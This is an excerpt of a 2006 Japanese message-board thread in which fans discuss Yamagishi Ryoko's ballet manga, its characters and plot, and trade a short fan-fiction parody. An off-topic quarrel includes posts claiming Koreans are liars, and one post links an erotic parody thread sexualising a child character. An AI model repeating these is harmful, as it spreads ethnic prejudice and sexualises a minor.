嵐はおまえだ

167 :名無しんぼ@お腹いっぱい:2006/08/14(月) 18:00:04 ID:pdhqfBcF0

き ゃ あ あ あ あ

スマン、「汐の声」思い出したw

168 :150:2006/08/14(月) 18:59:02 ID:9CwHfxWdO
>>151>>152
サンクス、大体把握した

169 :名無しんぼ@お腹いっぱい:2006/08/14(月) 21:41:47 ID:p48/9ayh0
山岸先生の今までの作品を読みたいんだけど
文庫はダブりが多いんだよね。
古本で買う場合を含めたらどれを買ったら
ダブらず色々読めるの?

170 :名無しんぼ@お腹いっぱい:2006/08/14(月) 21:58:30 ID:TjD14mN10
ttp://kategories.com/yamagishi/index.htm
ここの出版データを参考にするといいと思う。

角川全集が絶版らしいけど古本屋で上手くゲットできるといいかも。
それからASUKA(角川)の単行本は他の出版社で後からでた物に
収録されていない物があるみたい。
でも正直これくらいの大御所で出版社を渡り歩いている方では
ダブらずにってのは難しいですね。


171 :名無しんぼ@お腹いっぱい:2006/08/14(月) 22:03:29 ID:tLykx+u10
ダブルのはあきらめろ。
↓この辺のサイトを見て、ダブっていても許せる本を買う。
ttp://kategories.com/yamagishi/ftako.htm


172 :名無しんぼ@お腹いっぱい:2006/08/14(月) 23:55:54 ID:1tf6c5giO
懐かし漫画板のヒズテンスレでジョジョねたふったら、わかってくれる人が結構いて嬉しかった(´∀`*)ウフフ
みんないろんなスレに住んでるのよね
このスレにもいろんな人がいるんだろうなぁ
@みつを

173 :名無しんぼ@お腹いっぱい:2006/08/15(火) 00:21:01 ID:6LH4uf9RO
>>172
ダンス板じゃないの?
さっき覗きに行ったばっかだけど

174 :名無しんぼ@お腹いっぱい:2006/08/15(火) 01:16:13 ID:m56fr1UT0
漫画好きならjojoは結構押さえてるもんさ。

175 :名無しんぼ@お腹いっぱい:2006/08/15(火) 03:07:17 ID:e+VZEEMuO
>>173
ごめん素で間違えてた
指摘d

176 :169:2006/08/15(火) 22:25:38 ID:EiW/nlr50
>170-171
レスありがとう。
角川の全集が100均コーナーにたまに出てるので
それから買ってみます。


177 :名無しんぼ@お腹いっぱい:2006/08/16(水) 12:55:01 ID:aAwU4qY90
お母さんが千花ちゃんの学校にいったとき
エラのはった生徒が日誌を渡しに職員室にいたね。
昼休み6月号をみてぞっとしました。
あんなおんなのために亡くなった訳じゃないけど…

178 :名無しんぼ@お腹いっぱい:2006/08/16(水) 20:04:04 ID:8wAGGY7w0
ガイシュツかもしれないが、くらいはつけてほしい。
当時、散々出た話題だよ。

179 :名無しんぼ@お腹いっぱい:2006/08/16(水) 20:17:22 ID:Bk76sBEj0
あの時は
「あれがケバ子だなんて安易すぎ」って思ってたけど
いざマンガになってみるとあまり違和感なかったね。

180 :名無しんぼ@お腹いっぱい:2006/08/16(水) 20:22:36 ID:y0t1c7HV0
立ち読み&本スレの早さについていけないこっちだけロムなので
へー図書館へ探しにいくかぁ

181 :名無しんぼ@お腹いっぱい:2006/08/16(水) 21:40:17 ID:USXWD1ONO
178
ゴメンナサイ、絶対ガイシュツだとは思ったけど九月号にケバコがでたから書いてしまった。当時は全然気付かず、あの小太りの女教師感じ悪い。あいつかカキコミは、とか思ってました。バカネ。

182 :名無しんぼ@お腹いっぱい:2006/08/17(木) 00:48:50 ID:vRu40iK60
あの白キャラ女性教師は最後まで感じ悪かったなw

183 :名無しんぼ@お腹いっぱい:2006/08/17(木) 01:45:10 ID:YKOajwGIO
娘を亡くした父親のことハァ〜と。ギシ先生、白で小太りは、世間でよく目にする非常に一般的な考え方をする普通のヒトなんだがそれゆえかいやーな感じを受けるキャラをよく表してる。ウマイ。男教師のキモイ贔屓も明らかにはならぬのでしょうね。

184 :名無しんぼ@お腹いっぱい:2006/08/17(木) 02:21:16 ID:jeXFEvw80
結局六花が突然中学受験させられた理由は分からないままだね。
あの時点ではお稽古バレエの範囲でやってたはずだし。


185 :名無しんぼ@お腹いっぱい:2006/08/17(木) 02:33:02 ID:jzzVUg7y0
チカが国際コンクールや留学で忙しくなったら
智恵子さんがユキの高校受験にかまってやれなくなるからじゃないかな。

186 :名無しんぼ@お腹いっぱい:2006/08/17(木) 02:37:15 ID:aS4z/lAJ0
一回止めて、再びバレエを始めた時点で、
(プロにならないまでも)ずっと続けていくつもりだったじゃない?
だったら一貫校のほうが、(高校受験に悩まされず)都合がいい。
クミ出現で、かなり刺激されてたわけだし。

187 :名無しんぼ@お腹いっぱい:2006/08/17(木) 02:42:39 ID:HKL/P4A50
地元の効率はガラの悪い子がいたり?とかで
千恵子さんの気にいらなかったんじゃなかったっけ?

188 :名無しんぼ@お腹いっぱい:2006/08/17(木) 03:24:23 ID:pycd24Vt0
>>184
その時の俊夫と千恵子の会話の意味がわからない
俊夫「ユキにも適正有りと見たのかい?」 千恵子「難しい事になるかも」 ←うろ覚え

難しい事って何なんだー!

189 :名無しんぼ@お腹いっぱい:2006/08/17(木) 03:37:00 ID:aS4z/lAJ0
姉だけ私立とか、
ユキとチカの間で差をつける育て方をする両親じゃないと思う。


190 :名無しんぼ@お腹いっぱい:2006/08/17(木) 03:53:14 ID:C5y8S3rD0
>>188
その時点で千恵子はユキの実力をそれほどのものとは思っていなかった、
要するにそういうことでしょう。
ただ勿論、母として娘はかわいいわけで、環境を整えてやっても
同じ道を歩く以上、これから、どうしても追いつけない姉に対する
複雑な感情がユキのうちに生まれるのでは……と危惧してたんじゃないかな?

191 :名無しんぼ@お腹いっぱい:2006/08/17(木) 08:45:01 ID:h6ZR31KM0
やっぱ千花に本腰を入れるためじゃないかな。
千花が埼玉バレコンの入賞、クララの抜擢で伸び盛りの時期だし。

千花が順調に伸びてローザンヌに出たり留学することになれば
コンクールや学校見学に付き添ってヨーロッパに行くから
六花が公立中学に行ってると高校受験がおろそかになっちゃうでしょ。
バレエを続けるにしてもあきらめるにしても学歴はあったほうがいいから
高校受験のない一貫校につっこんどこうって考えだと思う。

192 :名無しんぼ@お腹いっぱい:2006/08/17(木) 13:37:51 ID:wxbPCddYO
千恵子さんに深い意図はないでしょ。
自分自身が中学から私立で、兄弟姉妹親戚中見渡す限りお私立とゆう知人がいるが
中学は私立が普通と思っているふしがある。
公立中学は未知の世界だから子供の進路相談や保護者人付き合いがデータ不足で
自分自身どうしていいか判らないとか。そのひとは大事をとって子供も私立にやったそうです。
まあ金に不自由してないのが前提だけどねー

193 :名無しんぼ@お腹いっぱい:2006/08/17(木) 14:45:22 ID:0HmHdx680
東京の公立なんてレベル下がりすぎだし
まともな親なら私立入れるよ

194 :名無しんぼ@お腹いっぱい:2006/08/17(木) 14:50:04 ID:Dl5yIUbi0
篠原家は別に私学絶対主義じゃないでしょ。
千花は高校受験によってレッスンできなくなるのを避けるために
中高一貫校に進むなら私学になっただけだろうし。
六花なんか本人も家族も公立に進学する感じだったんじゃないの。
もともと受験を予定してたら千花より早めの準備してたと思うし。

195 :名無しんぼ@お腹いっぱい:2006/08/17(木) 15:02:12 ID:JQPFTocc0
>>193
公立は、どんな子がいるか分からないからいじめが怖いし…とかいうけどね

196 :名無しんぼ@お腹いっぱい:2006/08/17(木) 18:03:58 ID:7W+mZCw00
私立で、どんな子がいるか分かってもいじめはある。

>>188
環境を与えても(夫に金銭の負担を強いても)かけた甲斐があるかわからない
(バレエの才能が花開くか)難しいって意味だと思ってた。

197 :sage:2006/08/17(木) 20:29:29 ID:YKOajwGIO
183
白キャラで小太りってフトミやエミちゃんのおかあさんとかなんか癖あるよね。ギシ先生小太りに嫌悪感あるのかな

198 :名無しんぼ@お腹いっぱい:2006/08/17(木) 20:30:43 ID:8ebbh3Qp0
話題トン切りでナンですが

篠原母は、ほとんど六花の舞台姿をまともに観てないよね。
代役クララのグランジュッテで舞台横切りとか、
千花手術と重なったクララ本番(貝塚での練習も)

家の稽古場でヘタレてる六花の様子しか知らないのよね。
ただでさえ「千花こそ私を超えるプリマに!」という
フィルターがかかってたんだし、
正しく評価できないのも無理ないね。

199 :名無しんぼ@お腹いっぱい:2006/08/17(木) 21:08:08 ID:O4nAtAnW0
舞台なら後でdvdで確認できたり、貝塚の評判聞いて、わかるんじゃないか?
生で見ないと説得力ないかもだが。
フロリナ姫の一件でも現れてるように、本番に強いのがユキなんだよね。
千恵子にすれば、いつでも安定してできなければ実力じゃない、
って評価なんだろうが。

200 :名無しんぼ@お腹いっぱい:2006/08/18(金) 02:38:08 ID:u41PQqGrO
亀な話題で悪いけど、千花のクララの演技は六花の借り物というのは違うと思う。 助けてはいるけど、 演じるのは あくまで千花自信だから。


201 :名無しんぼ@お腹いっぱい:2006/08/18(金) 02:48:23 ID:xpMq0OAr0
千恵子さんが六花をきちんと評価できないのは
股関節のせいもあると思うよ。
自分自身二重関節じゃなかったし
踊り全体より脚の開き具合を気にしてるような感じがする。



202 :名無しんぼ@お腹いっぱい:2006/08/18(金) 02:51:42 ID:shq3szPf0
金子がクララ六花のシーンで、千花は六花のアドバイスどおりに踊ってたんだもんね!とか言って無かった?
確認してないけど。演技では千花が六花を、
バレエのイメージみたいのは六花が千花を参考にしてたとかだった気がする。

203 :名無しんぼ@お腹いっぱい:2006/08/18(金) 05:49:15 ID:eK1NlZej0
参考とか通り越して、六花にとってはバレエのイメージ自体が千花なんだね。
1巻の六花の回想にもあったように、
年の差がほぼ2歳あって上手な千花は身近なお手本だろうし。小さい頃は特に。

千花のクララの時の六花のアドバイスは、
セリフを作って状況を分かりやすくしたり
見栄えする動作や、場面に合った表情を引き出すとかだったね。
千花が演技しやすい様に六花が噛み砕いてたように見えた。

204 :名無しんぼ@お腹いっぱい:2006/08/18(金) 07:57:01 ID:6LfGDdFf0
ただクミが現れるまで、チカの姿勢の素晴らしさに気付かなかったりと
やや疑問符が残るところもある。

205 :名無しんぼ@お腹いっぱい:2006/08/18(金) 09:36:17 ID:8QzQvL9a0
えっ?チカちゃんのに気がつかなかったのは
クミの姿勢の本当の正しさって事なんじゃない?
なんつってもワガノワ・メソッドだし
チカちゃんのは、クミに比べるとやっぱりどこかに無理がかかってるというか

206 :名無しんぼ@お腹いっぱい:2006/08/18(金) 09:56:33 ID:Wu/j8oAr0
顔以外はサラブレットだもんね、クミちゃん。
あの顔も現代なら整形可能。
AV女優も「身体直したりダイエットさせたりするのは金かかるから、ナイスボディな子の顔直す」時代。

207 :名無しんぼ@お腹いっぱい:2006/08/18(金) 12:42:13 ID:1akSrPYh0
>>200
あのまま、千花ちゃんが自分でああいう表現を編み出せない
という点では借り物の力とも言えるし、
でも、上手で親身な演技指導を受けたという捉え方もできる。

208 :名無しんぼ@お腹いっぱい:2006/08/18(金) 12:44:23 ID:1akSrPYh0
>>199
本番強いけど、その前にてんやわんやもあるw

209 :名無しんぼ@お腹いっぱい:2006/08/18(金) 16:45:33 ID:Bd6DI92w0
ここの人たちは舞姫ハッピエンド希望?六花ちゃんが大成するとか。

210 :名無しんぼ@お腹いっぱい:2006/08/18(金) 17:33:49 ID:bBSMQT2W0
読み応えがあるならハッピーでもバッドでもどちらでも。

211 :名無しんぼ@お腹いっぱい:2006/08/18(金) 17:41:30 ID:Eto9qiuB0
第一部完は一体どんな終わり方をするんだろう?

212 :名無しんぼ@お腹いっぱい:2006/08/18(金) 18:41:33 ID:ecTIbx2m0
来月はまずひとみちゃんがどうバレエと決着つけるか。
千花はあぽーんしたけど、ひとみちゃんはあの体型が武器になる
ような力強い踊りを取り戻し立ち直ってほしい。

213 :名無しんぼ@お腹いっぱい:2006/08/18(金) 18:47:28 ID:eatiqgvz0
ローザンヌ予選敗退
来年も再チャレンジを匂わせつつ1部完

214 :名無しんぼ@お腹いっぱい:2006/08/18(金) 18:51:31 ID:uxxjsiE40
>>202
そういう意味では、どっちが損とか得とかじゃなく、
お相子なのかもと思えてきた。あのクララは。

215 :名無しんぼ@お腹いっぱい:2006/08/18(金) 20:59:06 ID:6LfGDdFf0
良く言えば姉妹愛の結晶ともいえる。

216 :名無しんぼ@お腹いっぱい:2006/08/18(金) 21:45:27 ID:yyAE50ft0
別に千花が六花に愛を向けた結果というわけではないが。
対象が千花だろうが久美だろうが、六花がイメージに取り込んだという話で。

217 :名無しんぼ@お腹いっぱい:2006/08/18(金) 23:03:06 ID:1akSrPYh0
六花のクララの方は、たまたま身近にいた上手い人が千花だから、
動きのイメージの対象がああなっただけで、千花のおかげとは違うと思う。

218 :名無しんぼ@お腹いっぱい:2006/08/18(金) 23:24:42 ID:Q9Brh5La0
千花がケガをせず茜が引っ越してこなかったら、二年目は千花&六花のダブルキャストだったのかなあ。
そんな篠原先生が栄華を極めるようなことになったら、ひとみちゃんだけでなく五島先生まで退団するとか言い出しそうだけど。

219 :名無しんぼ@お腹いっぱい:2006/08/18(金) 23:43:43 ID:JPBv8N2k0
その場合なら千花が二日間やったんじゃない?
あるいは小柄な何とかさんとWキャストか…。

220 :名無しんぼ@お腹いっぱい:2006/08/18(金) 23:46:41 ID:FkA93vs70
>218
バレエ団内で反感をかうのを予測するだろうし
チケット負担に耐えられないから六花は辞退じゃないかな。


221 :次号予想:2006/08/19(土) 00:58:48 ID:habtUsRN0
貝塚、バレエよりも人生のほうが大切とひとみに伝え、ひとみは離脱する。
篠原家は、チカと祖母の死により仕切り直す。(借金返済)
ユキ、ルードラへ留学を決意する。
日本への置き土産に、「トォネラの白鳥」を完成させる。
第一部完。

222 :名無しんぼ@お腹いっぱい:2006/08/19(土) 01:15:39 ID:hPFYnDJD0
ユキはトゥオネラの振り付けをしたいことをトガシーに相談。
振付師になりたいなら一人前のダンサーになれとアドバイスを受ける。
ユキ、必死でがんばることを決意。

このくらいじゃないかな。ユキに関しては。

223 :名無しんぼ@お腹いっぱい:2006/08/19(土) 01:21:19 ID:hPFYnDJD0
ユキ、夢で見たチカの踊りをなぞろうとする。
自分の能力では踊れない部分があることに気付く。
振付師になるには一人前のダンサーにならないということに
自分で気がつく。

これでもいいかも。

224 :名無しんぼ@お腹いっぱい:2006/08/19(土) 04:20:23 ID:+qIXOk/4O
「気がつく」のはセリフじゃ済まなくて、なにかエピがあるのだろうね。
ひとかわ剥けるのは第二部に持ち越しかな。

225 :名無しんぼ@お腹いっぱい:2006/08/19(土) 14:13:13 ID:iULtDR7L0
今年の埼玉バレコンの動画、きたね。

226 :名無しんぼ@お腹いっぱい:2006/08/19(土) 17:38:17 ID:GJgwlTo40
茜ちゃんと双葉ちゃんが好みだな

227 :名無しんぼ@お腹いっぱい:2006/08/21(月) 22:46:42 ID:5EV84qTuO
千花ちゃん、六花ちゃん代わって、バレエができるのなら膝がどうなってもいい!って言ってたのにな…。(/_・、)

228 :名無しんぼ@お腹いっぱい:2006/08/22(火) 03:56:46 ID:JW6ku/050
あの時だけは、踊れるのなら笑われてもいいって言ってたのにね。
プロとして踊って食えなきゃ存在価値がないと思うようになってしまったのは
いつ頃からだったのかな。もう一度読み返したいんだけど読むの辛くて。

229 :名無しんぼ@お腹いっぱい:2006/08/22(火) 09:00:09 ID:5+MgxG6FO
親にそうとう負担かけたのに普通のバレリーナじゃだめ、とあの掲示板で思ってしまったのか

230 :名無しんぼ@お腹いっぱい:2006/08/22(火) 18:29:02 ID:9X5feE640
普通のバレリーナ=プロ=千恵子、という感じ?
千恵子が「自分以上になってもらわなくてはね」と期待してるし、
やっぱりそれ以上というと・・・。

231 :名無しんぼ@お腹いっぱい:2006/08/22(火) 19:03:13 ID:2QGBi6bE0
プリマハム

232 :名無しんぼ@お腹いっぱい:2006/08/23(水) 00:49:38 ID:XDhAv1idO
すべての始まり最初の手術をした若い医者に千花ちゃんの死は伝わらないのか。せめて夜眠れなくなるくらいにはなって欲しいのだが。

233 :名無しんぼ@お腹いっぱい:2006/08/23(水) 00:59:04 ID:JBLJ9Bms0
>>232
そんなに神経細かったら医者なんて務まらない

234 :名無しんぼ@お腹いっぱい:2006/08/23(水) 02:19:02 ID:UyWv836d0
「NHKスペシャル 韓国 論文捏造」再放送見た。
コレ見ると、医者に倫理は期待できない。
患者=モルモット。

235 :名無しんぼ@お腹いっぱい:2006/08/23(水) 07:49:55 ID:0Z2FmYyF0
医者にもいろんな人種がいるんだよ。
博士号取りたいだけのまさに患者はモルモットだと思っている医者、
臨床より教えることが好きな医者、
それこそ漫画のDrコトーみたいな24時間戦い続けている医者、
目を付けた看護師の自宅に張り込み、
お風呂に入ってる時、風呂場の窓に石を投げつけるイターイ医者…。

236 :名無しんぼ@お腹いっぱい:2006/08/23(水) 08:49:11 ID:XDhAv1idO
最初の手術を執刀したのは日本の医者ですぞ。カワイコちゃんの見舞いが多い、眼福、眼福と呑気に言っていた。腹立つ。

237 :名無しんぼ@お腹いっぱい:2006/08/23(水) 10:41:51 ID:bsZaLOjW0
それが本当ならお父さん黙っちゃないぞ

238 :名無しんぼ@お腹いっぱい:2006/08/23(水) 12:45:24 ID:Y5DM5YLw0
$BMxIW$O%P%l%($N$3$H$h$/$o$+$i$J$$$1$I!$(B
$B@i2V$A$c$s$N>P4i$,$_$?$$$+$i<j=QBe$r$@$7$F$$$@$N$@!#$@$N$K!$$@$N$K(B

239 :名無しんぼ@お腹いっぱい:2006/08/23(水) 16:13:07 ID:0Ns3eY0P0
そもそも、膝の靭帯再建なんてよくある手術で
受傷当日の腫れあがってるときにやるのが
基本から外れすぎてて設定としても不自然すぎ
専門医が学会でいなかったら帰るの数日待てばいいだけの事

あの場であわてて切る必要が何もない。

240 :234:2006/08/23(水) 16:15:39 ID:F5h2Gi650
捏造したのはもちろん韓国人なんだけど、
「サイエンス」に論文が提出されたとき、あまりにも画期的なので、
掲載するかどうか戸惑われたらしい。
そこに、掲載できるよう強く働きかけたアメリカ人識者がいたのさ。
番組の印象では、そいつは、韓国では人間の卵子で実験できることに
垂涎って感じだった。(ちなみに日本ではできない)
しかしこの韓国人教授、獣医関係だったとか。

241 :名無しんぼ@お腹いっぱい:2006/08/23(水) 16:18:54 ID:axFQQU0J0
黄教授だっけ?
どうでもいいけど、誰も聞いてないと思う

242 :名無しんぼ@お腹いっぱい:2006/08/23(水) 16:20:53 ID:0Ns3eY0P0
>>232 別に歩けなくなったわけじゃなし、歩ける走れる座れるで
手術としては上出来・標準。大怪我して元通りになる方が幸運なんだから。

自分で怪我しといて高度なプロに近いテクニックが出来なくなったと
いちゃもん付けて自殺したとか言ってこられても
病院的にはクレーマー扱いだよ。

243 :名無しんぼ@お腹いっぱい:2006/08/23(水) 16:30:37 ID:0Ns3eY0P0
>>234 はちょっとテレビで見たらもうその人種は
全員そうだと信じるめでたい脳みそだな
日本人は皆芸者腹きり出っ歯メガネか?(w

244 :名無しんぼ@お腹いっぱい:2006/08/23(水) 16:53:29 ID:F5h2Gi650
なに熱くなってんの?

245 :名無しんぼ@お腹いっぱい:2006/08/23(水) 16:54:15 ID:0Ns3eY0P0
なに取り繕ってんの?(w

246 :名無しんぼ@お腹いっぱい:2006/08/23(水) 16:56:30 ID:sF8+OMMN0
そろそろ少女漫画板に帰れ。

247 :名無しんぼ@お腹いっぱい:2006/08/23(水) 16:57:45 ID:F5h2Gi650
番組の感想述べただけなのに、すれ違いと指摘するなら承知するが、
(それでも、チカの手術で連想したのだが)
「めでたい脳みそ」だと、人格攻撃されるいわれはないんだが。


248 :名無しんぼ@お腹いっぱい:2006/08/23(水) 17:03:12 ID:0Ns3eY0P0
怖い医者もいる、ってなら分かるけど
医者は○○って全体を決め付けてるんだから
そういう人格だと思われても仕方ないじゃん(w

249 :名無しんぼ@お腹いっぱい:2006/08/23(水) 17:08:09 ID:F5h2Gi650
コレ見ると、番組の印象、と、番組の感想を言っている。
読解する気がないんでしょう?

下んないことに絡まないでほしい。

250 :名無しんぼ@お腹いっぱい:2006/08/23(水) 17:13:04 ID:0Ns3eY0P0
下んないことに言い訳・解説しないで欲しい(w
下んないならほっとけばいいのに

251 :名無しんぼ@お腹いっぱい:2006/08/23(水) 17:19:49 ID:F5h2Gi650
その下んない言い訳・解説をほっとけないオマエモナー。

252 :名無しんぼ@お腹いっぱい:2006/08/23(水) 17:20:42 ID:sF8+OMMN0
少女漫画板に帰れ。

253 :239:2006/08/23(水) 18:11:05 ID:XDhAv1idO
そうか。設定に無理があると悲しみも薄れてきますね。

254 :名無しんぼ@お腹いっぱい:2006/08/23(水) 18:40:56 ID:FBjdqVKz0
そーだ
ヲバは巣に帰って皇室話でチャットでもしてろ
(なんで昨夜の話を知ってるの ジブーン)

255 :名無しんぼ@お腹いっぱい:2006/08/23(水) 18:56:13 ID:0Ns3eY0P0
少女漫画板にも皇室にも全然関心がない自分には何のことやら・・

256 :名無しんぼ@お腹いっぱい:2006/08/23(水) 21:12:44 ID:D08zuhzB0
>>243
韓国人が嘘吐きなのは事実だろ・・・・しらないの?

257 :名無しんぼ@お腹いっぱい:2006/08/23(水) 22:11:44 ID:0Ns3eY0P0
>>256 ほほう、てことは偏見じゃない判断ができるほどに
たくさんの韓国人との観光旅行じゃない付き合いがあるわけだね
なるほど同属嫌悪か

258 :名無しんぼ@お腹いっぱい:2006/08/23(水) 22:13:36 ID:axFQQU0J0
>>256
>>234は、「医者は」患者をモルモット扱いしており、「医者に」倫理なんか期待できないと
いいたかったんだよ。文章ちゃんと読んであげなよ

259 :名無しんぼ@お腹いっぱい:2006/08/23(水) 22:17:28 ID:0Ns3eY0P0
どっちみちテレビに出てた医者がそうだから
医者は○○
なんていってるあたり知性のある発言ではない



260 :名無しんぼ@お腹いっぱい:2006/08/23(水) 22:27:56 ID:Kzb/EJ3n0
まだやってるのか、粘着だな。

261 :名無しんぼ@お腹いっぱい:2006/08/23(水) 22:31:35 ID:9EU7Wo8l0
短絡的な女が多いからな。向こうもこっちも。

262 :名無しんぼ@お腹いっぱい:2006/08/24(木) 01:03:51 ID:LGmqm3+X0
まあ、女はみんな○○とかいう短絡男も多いわけだが

263 :名無しんぼ@お腹いっぱい:2006/08/24(木) 01:09:25 ID:NnEquDlX0
なんなのこの流れ。
あっちが新スレ誘導なかったからってここに流れてこないで欲しいわw

264 :名無しんぼ@お腹いっぱい:2006/08/24(木) 02:35:23 ID:U5cLt1XvO
みんな暇なんだよ

話を桜子に戻しましょうか

265 :名無しんぼ@お腹いっぱい:2006/08/24(木) 04:41:49 ID:Ps8DkniV0

ノP
  v |
´P



266 :名無しんぼ@お腹いっぱい:2006/08/24(木) 15:11:33 ID:IjM35LzZ0
【千花】山岸凉子作品でエロパロ【破瓜】
http://sakura03.bbspink.com/test/read.cgi/eroparo/1155913283/

267 :名無しんぼ@お腹いっぱい:2006/08/24(木) 17:29:17 ID:ok3XDGgQ0
>>265
やっとわかったw
GJ!

268 :名無しんぼ@お腹いっぱい:2006/08/24(木) 18:03:39 ID:GXgQjcmo0
>>265
これ誰考えたんだ?すげw

269 :名無しんぼ@お腹いっぱい:2006/08/24(木) 18:36:02 ID:RmvlWSHEO
>>265
ケータイから見ると更に味わいがw
何か、いわさきちひろテイストすら感じるよ
すごいw

270 :名無しんぼ@お腹いっぱい:2006/08/24(木) 18:39:59 ID:GXgQjcmo0
いわさきちひろ似てる!ww

271 :名無しんぼ@お腹いっぱい:2006/08/24(木) 19:27:09 ID:p/OiMWGi0
マカー用。だとよくわからん

272 :名無しんぼ@お腹いっぱい:2006/08/24(木) 23:55:19 ID:36egAQcq0
>>257
韓国での偽証罪は日本の数百倍。これでいいか?

273 :名無しんぼ@お腹いっぱい:2006/08/25(金) 01:06:11 ID:P0hAxb4p0
なんだろう 何か荒廃したような!?

山岸!?なんとすさんだレスをして

驚いたな、どうなっているのだこれは


異常だ!!
この山岸スレで何が起きたというのだ!

一人の女!
あの山岸をめぐってみんなが狂っているとしかおもえぬ!!

274 :名無しんぼ@お腹いっぱい:2006/08/25(金) 01:17:51 ID:z5DpUlmN0
雑談や馴れ合いを開始されるくらいなら、過疎っていた方が健康的でしょう

275 :名無しんぼ@お腹いっぱい:2006/08/25(金) 02:22:32 ID:Tvk51+d0O
>>273
入鹿乙

276 :名無しんぼ@お腹いっぱい:2006/08/25(金) 08:47:56 ID:VqaGXAbR0
>>273
ギッシー先生 モテモテ
裏山スィ〜

277 :名無しんぼ@お腹いっぱい:2006/08/25(金) 10:20:09 ID:7MWUHzNe0
>>228
あれは、笑われるとしても踊れれば、いずれ上達して上へ這い上がる
道が開かれるという感じかなあ?
もしかしたら、その後、茜や上達した六花を見て「私はそれ以上に踊ってみせる」
という気持ちが強くなった影響も出てきたのかも。
意外なくらい、母親の期待や評価を気にしていたしね。
六花ちゃんの場合は、父親が理解者で、母親は自分にないものを補っていてくれてたけど、
千花ちゃんは、父親との縁が希薄そうだ。親子仲はいいけど。


278 :名無しんぼ@お腹いっぱい:2006/08/25(金) 14:00:06 ID:Ri9AxKHi0
もうね…もう千花ちゃんはね…

279 :名無しんぼ@お腹いっぱい:2006/08/25(金) 14:23:31 ID:nJ9sPcVn0
わたしの竹田を返してくりゃれ

280 :名無しんぼ@お腹いっぱい:2006/08/25(金) 14:27:09 ID:Ri9AxKHi0
あなたの裾に

281 :名無しんぼ@お腹いっぱい:2006/08/25(金) 14:44:42 ID:7MWUHzNe0
躍りに台詞が見えた次は、
母親の裾に亡き姉が見える六花。
夢を見たり霊感が強そうじゃん。

282 :名無しんぼ@お腹いっぱい:2006/08/25(金) 14:50:35 ID:dXnS1vky0
>>281
チカちゃん長物になってたければいいけど。・゚・(ノД`)・゚・。

283 :名無しんぼ@お腹いっぱい:2006/08/25(金) 14:56:28 ID:KB1VnXPp0
長物だったら毛箱に取り憑く。
きゃーぁぁぁぁぁぁ。

284 :名無しんぼ@お腹いっぱい:2006/08/25(金) 19:29:08 ID:4K3OR13m0
彼女のプライドはそんなことをしないでしょう
いや、張り詰めたプライドの殻が壊れたらすごいことに
なるってのもありだけど

285 :名無しんぼ@お腹いっぱい:2006/08/25(金) 19:52:33 ID:f6dFixv50
チカちゃん、毛箱なんかよりはどこぞの天才プリマに憑きそうな気がするが。

286 :名無しんぼ@お腹いっぱい:2006/08/25(金) 19:59:30 ID:4K3OR13m0
足を欲しがって化けて出るバレリーナの話
悪魔の花嫁であったなぁ

287 :名無しんぼ@お腹いっぱい:2006/08/25(金) 20:38:05 ID:PqTCYm940
サビた画鋲をトゥシューズに入れられて、
ケガしたのがきっかけだったよね

288 :名無しんぼ@お腹いっぱい:2006/08/25(金) 20:41:48 ID:cgts0srU0
>>285
バレエに全然興味のない小学生の男の子に取り憑いてほしいな。
「私はもっともっと踊りたかった」と言って男の子の才能を開花
させるのがいい。

289 :名無しんぼ@お腹いっぱい:2006/08/25(金) 20:46:49 ID:f6dFixv50
>>288
それなら少年のチカちゃんへの淡い恋心と憧憬も混じって
とてもいい話になりそうだ!

290 :名無しんぼ@お腹いっぱい:2006/08/25(金) 21:38:46 ID:9OiS1f010
>>288
その男の子、乙女になってしまいそうだ…

291 :名無しんぼ@お腹いっぱい:2006/08/25(金) 22:51:48 ID:L5xdM1IY0
>>288
ヒカルのバレエかw

292 :名無しんぼ@お腹いっぱい:2006/08/25(金) 23:05:57 ID:xJ+Ic8qG0
>>288
意外といいかも。読んでみたい。
男が主人公のバレエ漫画ってある?

293 :名無しんぼ@お腹いっぱい:2006/08/25(金) 23:33:57 ID:Tvk51+d0O
有吉京子さんのニジンスキー寓話とか?
何かホモっぽかったのと、絵が受け付けなかったから、読んでないけど

294 :名無しんぼ@お腹いっぱい:2006/08/25(金) 23:57:59 ID:9CtFyMcp0
>>292
萩尾さんのローマへの道とかは私は好き。

295 :名無しんぼ@お腹いっぱい:2006/08/26(土) 00:15:17 ID:wzLpMAmL0
ニジンスキー寓話があったか。忘れてた。
確かにホモだが面白かったよ。

296 :名無しんぼ@お腹いっぱい:2006/08/26(土) 05:34:09 ID:2BrqPGmw0
ニジンスキーは山岸さんも描いてるよね。
「牧神の午後」

297 :名無しんぼ@お腹いっぱい:2006/08/26(土) 05:42:29 ID:DxSvZZxo0
ニジンスキー寓話、文庫で買ったけど1巻の途中で挫折
うっぱらった。
ローマも牧神の午後もかなり面白かったけど、有吉さんのは自分には合わなかった

298 :名無しんぼ@お腹いっぱい:2006/08/26(土) 09:56:16 ID:x99Q6U3d0
自分は一時期妙にはまってしまったなw>ニジンスキー寓話
萩尾さんなら「感謝知らずの男」も良かった。

299 :名無しんぼ@お腹いっぱい:2006/08/26(土) 15:40:21 ID:j/7mKJBZ0
>>288,291
ヒカルのバレエw
祖父の蔵に染みがにじんだポワントを発見。
「!!そなた、この染みが見えるのですね…!?」

そして少年はポワントで踊る為にトロカデロの入団を目指す…

300 :名無しんぼ@お腹いっぱい:2006/08/26(土) 17:13:20 ID:eq26IusG0
トロカデロかよ!w
い、いや、いいんだよ。彼らの舞踏は芸術だもの。

301 :名無しんぼ@お腹いっぱい:2006/08/26(土) 22:58:42 ID:eoBQ1ymPO
ヒカルのバレエ、イイ!
芸のある方、御降臨キボウヌ

302 :ヒカルのバレエ:2006/08/27(日) 00:50:09 ID:/3uY8MRn0
少年はあくびをこらえながら、自分の住むマンションの屋上へ上がってきた。
天気のいい日は、高いところに限る……と彼は思う。
(危ないから止せなんて、母さんは言うけどさぁ)
越してきたばかりの少年には、抑えきれない好奇心がたっぷりとある。
冒険したくて仕方のない年頃なのだ。
「うわーっ、高ぇー!よし、今日はここで昼寝だな」
うつらうつらとしていると、ピアノの音が聞こえてくる。この曲は少年でも知っていた。
白鳥の湖……。
やがて、しくしくと泣き声が聞こえてくる。誰かが泣いている、と少年は思った。
まぶたの裏に、誰かの姿が浮かんでくる。制服姿のお姉さんだ……と思った。
それはまだ少女の姿だったけれど、彼には中学生はずいぶん年上に思える。
と、彼女が顔を上げた。美しい少女が驚いたように彼を見ていた。
「だれ?」
少女は彼に話かけた。
「私が見えるの?聞こえるの?」
少年ははっと目を覚まし……そして、まだ目の前に彼女がいるのに驚いた。
「うわぁああああ!!!」


続き書きませんよwww

